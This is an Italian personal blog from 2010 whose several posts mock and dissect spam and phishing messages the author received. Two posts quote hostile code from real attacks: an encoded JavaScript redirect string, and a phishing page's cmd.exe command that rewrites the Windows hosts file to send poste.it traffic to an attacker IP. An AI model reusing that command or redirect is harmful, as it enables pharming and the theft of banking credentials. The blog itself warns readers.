No, non preoccupatevi, non è il vostro browser che è impazzito. Semplicemente la scorsa settimana mi sono trovato un messaggio di spam sulla casella aziendale, dove una gentil signorina ucraina trentenne (di più non mi ha detto) voleva parlare con me. Quello che ha colpito il mio occhio è stata questa frase:
«Sono sicuro che la nostra conversazione puo essere molto интерестинг»
Che manchi l’accento è normale, ma la parola in cirillico no. Traslitterare il russo non è molto difficile: i caratteri cirillici sono l’equivalente dei caratteri latini «interesting». Il dubbio che mi assale non è ovviamente “cosa può esserci di interessante nella nostra conversazione”, ma “com’è che il traduttore automatico si è dimenticato di quella parola?” Misteri misteriosi.

Ultimo aggiornamento: 2010-12-21 07:00

Lo spam che mi è arrivato ieri sulla casella di posta aziendale aveva un testo che non sono riuscito affatto a comprendere:

Dare ai nostri consulenti amichevole una chiamata ora, sono più che disposto ad aiutare a fare la maggior parte del vostro gioco.
I nostri giochi fornire intrattenimento eccezionale sia ai principianti così come i giocatori veterani – venire a dare una chance ora.

Mi chiedo se siano giochi erotici, giochi da casinò oppure qualcosa di completamente diverso, chessò roba di lavoro.
Ma quello che mi ha lasciato più perplesso è il titolo:
RE: Deliziati da un servizio clienti esemplare da uno staff di consulenti pronti a rispondere a tutte le vostre domande 24/7/265.
E gli altri cento giorni?

Ultimo aggiornamento: 2010-11-03 07:00

È abbastanza facile che persino il mio blog periferico ogni tanto abbia alcuni spam di gente che scrive in inglese e dice qualcosa tipo “nice blog”, sperando che io sia così imbecille da approvare il loro post.
Ma un paio di settimanefa mi è arrivato un messaggio con questo testo:
Come Newbie, sono sempre alla esplorazione in linea sugli articoli che possano migliorarmi sull’argomento. Lascio anche l’ indirizzo di posta elettronica perché mi picerebbe avere avvisi sui prossimi aggiornamenti. Speciale blog.
Il “nome” del nostro commentatore è Preventivo Prestito, il sito non ve lo dico ma è un .net chiaramente italiano, l’IP di invio è 195.72.161.106 che corrisponde a non si sa cosa, perché è un record PTR a purple.community.co.uk che però non sembra esistere almeno come sito web ma ha solo un record MX. Sarà una traduzione anche il messaggio oppure no? misteri…

Ultimo aggiornamento: 2010-10-12 17:57

Bisogna dire che i phisher stanno diventando sempre più creativi, anche se hanno sempre dei grossi problemi con la lingua italiana (ma chi non ne ha?)
L’ultimo messaggio che mi è arrivato mi manda a un sito dove devo rispondere ad alcune domande per un sondaggio per conto della Coca-Cola; finito il sondaggio casco su una pagina (http://agrogarden.hu/include/coke_italia/coke_italia/refundportal.htm, ma non so quanto reggerà) dove appunto mi si prega di selezionare la mia banca. Chissà se qualcuno userà il codice utente pippo, password pippo, per entrare nel BCC…
Ah, oltre alla frase del titolo vi segnalo che “Ogni persona che prende il sondaggio vincerà 150 euro”. Mica male, no?
Da questo punto di vista, bisogna dire che l’altro phisher (immagino russo, visto che le lettere accentate mi si visualizzano come caratteri cirillici) che mi scrive

Questo messaggio и stato inviato da eBay .
Il tuo nome non и stato indicato in modo da garantire l’autenticitа del messaggio.

fa tanto ricordare i virus elboniani…

Ultimo aggiornamento: 2010-09-15 16:44

Ieri mi è arrivato un commento (su un vecchio post in cui parlavo di me stesso come faccio di solito) che iniziava così: «Un po´di giorni fa ho scritto al blog di quella serpe schifosa, che di certo e’ il figlio di puttana e, parrebbe, certamente, anche pedofilo *** […] »; vi lascio immaginare il prosieguo.
Posso anche scrivere nome e cognome della sedicente mittente del messaggio (Antonella Rebuffini), perché tanto Google non ritorna nessun risultato a suo nome, e quindi immagino sia un nome fasullo; sicuramente l’indirizzo email che ha messo non esiste.
Ora io non so chi sia ***, e anche se lo sapessi e convenissi con il giudizio della sedicente signora o signorina Rebuffini non mi sognerei mai di scriverlo, nemmeno anonimamente; facendo una ricerca sul suo nome-e-cognome bisogna però dire che la maggior parte dei primi risultati che appaiono sono insulti nei suoi confronti, il che significa che forse a qualcosa tutto questo stalking serve (dal punto di vista di chi lo stalking lo fa, intendo). Però non mi pare comunque così bello andarsi a intrufolare in casa altrui per scrivere queste cose. A voi piacerebbe che qualcuno arrivasse a casa vostra e cominciasse a imbrattarla con scritte varie contro Berlusconi?

Ultimo aggiornamento: 2010-09-13 13:25

Stamattina la casella Gmail mi ha presentato un messaggio chiaramente spammoso ma che non era stato filtrato. Il mittente era ungherese, non era inviato in bcc ma a cinque destinatari espliciti, c’era qualche parola con i caratteri modificati (per la cronaca, “sensua| vibe in your re|ationships”); ma soprattutto c’era questo link.
http://www.google.fm/search?q=cache%3Acache%34%79%6F%75%2E%69%6E%66%6F
Lasciate perdere il .fm che è il google micronesiano: funzionerebbe anche con google.com. Tutti i % sono caratteri in esadecimale che dicono di vedere qual è la cache del sito cache4you.info: se uno clicca lì sopra riceve la cache di quel sito, che ha una simpatica funzione javascript che rimanda al sito spammoso vero e proprio. Per la cronaca la funzione converte la stringa qui sotto:
str=”60!105!109!103!32!97!110!100!114!34!61!34!62!34!111!110!101!114!114!111!114!61!39!119!105!110!100!111!119!46!116!111!112!46!108!111!99!97!116!105!111!110!46!104!114!101!102!61!34!104!116!116!112!58!47!47!104!117!103!101!111!101!109!100!105!115!99!111!117!110!116!46!105!110!102!111!34!39!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!32!115!114!99!61!34!104!116!116!112!58!47!47!108!111!99!97!108!104!111!115!116!47!114!102!103!103!114!101!103!114!101!103!114!101!103!101!114!103!46!106!112!103!34!62!”
Devo dire che l’idea di farsi indicizzare il sito prima e mandare il link alla cache dopo è geniale: in questo modo si fa credere a google che non ci sia nulla di strano nella pagina :-)

Ultimo aggiornamento: 2010-05-20 10:16

Stamattina mi sono arrivati due messaggi di spam: uno su gmail (che non l’ha nemmeno messo nella posta in arrivo) e uno su Tiscali (che mostra sempre tutto, mi chiedo perché mai mi ostino a selezionare come spam i messaggi visto che tanto non ci fanno nulla). Entrambi puntavano allo stesso sito, ma con due nomi diversi: http://www.scatti-privati.com/ e http://www.fotoasorpresa.com/ (l’home page si direbbe “pulita”, il resto non l’ho certo testato).
Il sito in questione si chiama The Final Joke; da una rapida scorsa ai termini di servizio, si direbbe che è nato per ottenere indirizzi di ignari internauti. In futuro non saprei che cosa succederà

Ultimo aggiornamento: 2010-04-29 14:25

Mario mi invia un messaggio di phishing proprio “simpatico” che gli è arrivato (e che gmail fortunatamente mette nello spam).
Il messaggio ha come titolo Autovelox e Tutor: dove sono?, il sedicente mittente è info@auto.it, la provenienza sembra essere dall’IP 192.168.74.6, e racconta di come la polstrada abbia messo un sito dove sono indicate le postazioni degli autovelox (vero). Cosa succede però se si apre il link, che – come forse avete immaginato – NON è al sito della Polizia Stradale?
Il codice HTML di quella pagina contiene tra l’altro queste righe:
<param name='first' value='cmd.exe /c echo 210.86.2.150 poste.it >>
%windir%\System32\drivers\etc\hosts & echo 210.86.2.150 www.poste.it
>> %windir%\System32\drivers\etc\hosts' >
Detto in termini meno criptici: se uno ha un PC con Windows, gira con i privilegi di amministratore, e ha un browser non troppo sveglio (Insomma Etilista) allora la pagina web fa in modo che la prossima volta che il malcapitato vuole andare nel sito www.poste.it sarà automaticamente rediretto al sito 210.86.2.150, che a sua volta (in questo momento, ma il bello della cosa è che possono cambiarlo quando vogliono!) punta a ftp://213.123.204.189/bpol/cartepre/index.html; che cosa faccia questo sito, ve lo lascio immaginare.
Come avrete intuito, la cosa pericolosa è che il phishing vero e proprio arriva in un secondo momento, e quindi l’ignaro utente non si accorge di nulla. Sapevàtelo!

Ultimo aggiornamento: 2010-03-05 11:44